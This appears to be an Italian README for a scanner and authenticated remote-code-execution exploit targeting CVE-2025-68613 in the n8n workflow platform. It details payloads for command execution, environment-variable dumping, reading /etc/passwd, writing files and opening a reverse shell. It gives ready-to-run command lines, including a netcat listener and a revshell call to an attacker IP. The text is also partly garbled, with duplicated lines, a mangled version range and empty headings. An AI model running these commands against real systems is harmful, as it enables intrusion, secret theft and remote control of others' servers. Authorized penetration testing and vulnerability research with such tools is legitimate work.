
n8n CVE-2025-68613
Questo toolkit fornisce scanner ed exploit PoC per la vulnerabilità critica CVE-2025-68613 in n8n Workflow Automation Platform.
Questo repository fornisce script scanner ed exploit PoC per la vulnerabilità critica CVE-2025-68613 che colpisce n8n Workflow Automation Platform.
Questo strumento è SOLO per test di sicurezza LEGITTIMI e AUTORIZZATI. È vietato utilizzare questo strumento su sistemi senza il permesso del proprietario.
Questo strumento è SOLO per test di sicurezza autorizzati e legali. L'uso non autorizzato è illegale e vietato.
0.211.0 – 1.120.31.121.01.120.4+1.121.1+1.122.0+.
├── tot-scanner-2025-68613.py # Vulnerability Scanner (NO exploit)
├── tot-exploit-2025-68613.py # Authenticated RCE Exploit PoC
├── requirements.txt
└── README.md
Lo scanner viene utilizzato per:
Lo scanner:
Lo scanner controlla i seguenti endpoint:
//rest/settings/healthz/api/v1/healthPacchetti richiesti:
Contenuto del file requirements.txt:
requests>=2.28.0
Pacchetti richiesti:
Contenuto di requirements.txt:
requests>=2.28.0
pip install -r requirements.txt
python3 tot-scanner-2025-68613.py -u http://target.com:5678
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json
{
"target": "http://target.com:5678",
"detected": true,
"version": "1.121.0",
"vulnerable": true,
"status": "vulnerable",
"cve": "CVE-2025-68613"
}
| Codice | Significato |
|---|---|
| 0 | Non vulnerabile |
| 1 | Versione sconosciuta |
| 2 | Vulnerabile |
Questo exploit RICHIEDE credenziali n8n valide
L'accesso autenticato è OBBLIGATORIO
L'exploit funziona così:
Set| Argomento | Obbligatorio | Descrizione |
|---|---|---|
-u / --url | ✅ | URL target n8n |
-e / --email | ✅ | Email dell'account n8n |
-p / --password | ✅ | Password dell'account n8n |
--payload | ✅ | Tipo di payload |
--command | ❌ | Comando del sistema operativo (cmd) |
--file | ❌ | Percorso del file (read/write) |
--content | ❌ | Contenuto del file (write) |
--lhost | ❌ | IP dell'attaccante (revshell) |
--lport | ❌ | Porta dell'attaccante (revshell) |
--verify-ssl | ❌ | Verifica il certificato SSL |
| Payload | Funzione |
|---|---|
info | Informazioni di sistema |
cmd | Esecuzione di comandi |
env | Dump delle variabili d'ambiente |
read | Lettura file |
write | Scrittura file |
revshell | Reverse shell |

python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload info
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload cmd --command "id"
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload read --file /etc/passwd
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload write --file /tmp/pwned.txt --content "owned"
nc -lvnp 4444
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
/rest/*Questo progetto è fornito solo per test di sicurezza autorizzati e a scopo educativo.
L'autore non è responsabile per un uso improprio.
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python
Resta legale. Resta etico.